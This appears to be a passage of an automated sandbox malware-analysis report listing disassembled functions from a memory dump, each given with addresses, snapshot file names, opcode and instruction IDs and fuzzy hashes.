                                                                      • Opcode Fuzzy Hash: b4de9ccdc03301b4f8b34275fbf37b0f750ec48e4bf8e95f9c956194bf01efe9
                                                                      • Instruction Fuzzy Hash: 63E01270E0D51A46FBA4A794D8617F9A2A0DB58300F1510B8D50E933E5CD38AF41C655
                                                                      Function 00007FFD9B8D7489 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d123fd876d44ccce82e14437c010fe515090c630012e71429d3587942c688850
                                                                      • Instruction ID: 9d1182094a3a44a0a0458e808983bbaf20c2a1affacd0e3d826d01be618b992f
                                                                      • Opcode Fuzzy Hash: d123fd876d44ccce82e14437c010fe515090c630012e71429d3587942c688850
                                                                      • Instruction Fuzzy Hash: E9E01A2594E7C04FC70B9B3488688507F609E5721074A41EFC085CF1B3E6298949C712
                                                                      Function 00007FFD9B8DD4D9 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: baaa923ecd16f78b8a9c8147d1a76f595faa84102fd83cef29b70c0efe9018e5
                                                                      • Instruction ID: 6deac501ed5256ab85c86dfda7ca8e52007ad53535fe4853987e3591085385c7
                                                                      • Opcode Fuzzy Hash: baaa923ecd16f78b8a9c8147d1a76f595faa84102fd83cef29b70c0efe9018e5
                                                                      • Instruction Fuzzy Hash: 0CE04F2194F7C04FCB1B973488789547F60DE5721078A41EFC085CF5B3D5199849C702
                                                                      Function 00007FFD9B8D1C90 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFD9B8DB388 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction ID: e159db3d1baf8b714e0b2ef2eeb1dc9703ef029d07ffbbf2fb7c7ab3a198a8bb
                                                                      • Opcode Fuzzy Hash: dad24a7085e4b25ae976ee30ed72e40c0fd5f4a8708794f52b09698d4d43b31b
                                                                      • Instruction Fuzzy Hash: 5FD02230B918040FC70CA738885883033A1EBAE20678101A9D00ACB2B1D92AEC88C780
                                                                      Function 00007FFD9B8D6A90 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8D1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8d1000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction ID: 9287ece90662f174b75bd3620d04f448f3b50f5bf2a07f30c896a893bc595a01
                                                                      • Opcode Fuzzy Hash: 1388b68208c2cafb3d95faa5872f9f62582b941bae5f6671caa91d2bd9987ffc
                                                                      • Instruction Fuzzy Hash: EDD02234B548040FC70CA73988588303391EBAE21A7C101A9D00AC72B1E92ADC88C740
                                                                      Function 00007FFD9B8A06A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8a0000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                      • Instruction ID: ab73628609897484b5323898f8225aaedd8b1f29e8e1aaf51fe684aa9bd7f702
                                                                      • Opcode Fuzzy Hash: 4b40751a1cefa32304aed0fb67d836df1cb2b4d29e4b1e5402fa9057282fa0e8
                                                                      • Instruction Fuzzy Hash: B1C04C05F6B61F01F83577EE98660ACA1405BDDF14FD71172D54D400E1AC4D22D94177
                                                                      Function 00007FFD9B8A1310 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8a0000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction ID: b66f0a4f3c627f62ea8beb07cea449c7f48290288c6452d6696383f985f3b06a
                                                                      • Opcode Fuzzy Hash: 668c455a36bf044a3fc1981b792573f4f4189be78a65a753a26ab6c65c12f0f8
                                                                      • Instruction Fuzzy Hash: F2C08C3051180C8FC948EB28C88481833A0FB0D300BC20090E009C7270E269EDC2C740
                                                                      Function 00007FFD9B8B685C Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8b0000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c7af4e10c5c5d7611ef95a75994486f26815a3cba6145b1773c7df351516a773
                                                                      • Instruction ID: 64ce4b87ac9713a430679c3946a41a1bdbd4907eb1de9f5ab3287e6b07628cfa
                                                                      • Opcode Fuzzy Hash: c7af4e10c5c5d7611ef95a75994486f26815a3cba6145b1773c7df351516a773
                                                                      • Instruction Fuzzy Hash: FBD0C930D045298FEBA0DB648890BA872B1AF48300F5000F6800CE3295CA356D80DF50
                                                                      Function 00007FFD9B8A4E17 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8a0000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction ID: e5b5c26ce102d7dd1f1dedba303de81fb7292dcd98c31b273fe6b3ce7dd73bc5
                                                                      • Opcode Fuzzy Hash: 73f9df46521dc5d9b38235658b75fdd496f8a23a7d2725a714683a5f0d8331b5
                                                                      • Instruction Fuzzy Hash: E6C08CA1E2821985E32496A048291AAB3818F09220F528672809D660A5DE28660292A0
                                                                      Function 00007FFD9B8A2555 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8a0000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6911ce86e53a47f1edf67b0598c53b7f52ec4df8ef27b17fcaa687d56a038d65
                                                                      • Instruction ID: 89916dcb214d254dd69f49c65b335e7d52e23445f783ba50ebd8189180743ddf
                                                                      • Opcode Fuzzy Hash: 6911ce86e53a47f1edf67b0598c53b7f52ec4df8ef27b17fcaa687d56a038d65
                                                                      • Instruction Fuzzy Hash: C7C04C05F18C2A46F35A6614443167E84929B44754F9554B4E41D976DECD1C6A1242C7
                                                                      Function 00007FFD9B8A06C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8a0000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction ID: ae704cd2675e12a4067d49166756726089a8d4ea23ac26a08bc41097d1ab0308
                                                                      • Opcode Fuzzy Hash: 709359157962c98cd0ecdf05242bc1fd9eaca1de47418e54626fafadeef44463
                                                                      • Instruction Fuzzy Hash: 37B01200E6740F00E42433FB08920A470405B4C600FC61070D40E40091D84D22980263

                                                                      Non-executed Functions

                                                                      Function 00007FFD9B8A09B0 Relevance: 5.2, Strings: 4, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000024.00000002.3203106023.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_36_2_7ffd9b8a0000_ROxqvkhuKqPawtyxZXXxveaCsizbJ.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 0c3b06beb0677065432428f0b9d6bcea3016760cb5bde0b927d35fb793fcb833
                                                                      • Instruction ID: 636d37efbc523c549b5c4d6ab394c9e5abf3abb6e24b77dea99c8e6f0a792653
                                                                      • Opcode Fuzzy Hash: 0c3b06beb0677065432428f0b9d6bcea3016760cb5bde0b927d35fb793fcb833
                                                                      • Instruction Fuzzy Hash: A6419F87B1947A85E31E37FD79299FC6B44CF8533DB0843B7E05E8A0D76C88608292E5